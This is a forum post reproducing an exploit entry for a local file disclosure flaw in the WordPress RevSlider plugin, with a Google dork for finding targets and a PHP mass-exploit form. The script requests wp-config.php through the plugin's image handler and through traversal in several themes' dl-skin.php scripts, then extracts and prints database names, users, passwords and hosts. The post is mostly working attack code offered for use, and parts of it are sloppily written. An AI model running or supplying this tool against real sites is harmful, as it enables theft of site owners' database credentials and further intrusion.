Aerosol Posted January 1, 2015 Report Posted January 1, 2015 # Exploit Title: [Wordpress RevSlider Plugin LFD]# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image# Date: 12/29/14# Exploit Author: FarbodEZRaeL# Vendor Homepage: iranhack.org# Software Link: wordpress.org# Tested on: windows#Exploit:<html><head><title>Exploits Wordpress</title></head><body style="background-color: rebeccapurple;"><pre><p><center style="color: aqua;">============================================================== Exploits Wordpress RevSlider Plugin LFD Vuln == == Coded by FarbodEZRaeL == Iranhack Security team == www.iranhack.org == Fix bug Other Version ==============================================================<pre><href><form method='POST'><textarea name='sites' cols='45' rows='0'></textarea><br><input type='submit' value='Exploit' /></form><?php# Coded by FarbodEZRaeL# Exploits Wordpress RevSlider Plugin LFD Vuln @file_get_contents("$site/?author=1");preg_match('/<title>;(.*?)<\/title>/si',$users,$user);$wpuser = explode('|',$user[1]);echo " <br>======================================</br>";echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version :".$str."<br>";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,"$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");curl_setopt($ch, CURLOPT_HTTPGET, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;Windows NT 5.0)");$xp = curl_exec ($ch);curl_close($ch);if(preg_match("#DB_USER#i",$xp)){preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);echo "DB_NAME:{$DB_NAME[1]}<br>";preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);echo "DB_USER:{$DB_USER[1]}<br>";preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);echo "DB_HOST:{$DB_HOST[1]}<br>";}$lt =array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");foreach($lt as $l){$site = "$site/$l";$process = curl_init($site);curl_setopt($process, CURLOPT_TIMEOUT, 30);curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE7.0; Windows NT 6.0)");curl_setopt($process, CURLOPT_HEADER, TRUE);curl_setopt($process, CURLOPT_POST, 1);curl_setopt($process, CURLOPT_POSTFIELDS,"_mysite_download_skin=../../../../../wp-config.php");curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);$return = curl_exec($process);if(preg_match("#DB_USER#i",$return)){preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);echo "DB_NAME:{$DB_NAME[1]}<br>";preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);echo "DB_USER:{$DB_USER[1]}<br>";preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);echo "DB_HOST:{$DB_HOST[1]}<br>";break;echo " <br>-----------------------------------</br>";ob_implicit_flush(true);ob_end_flush();}}}?></pre></p></center>Source Quote
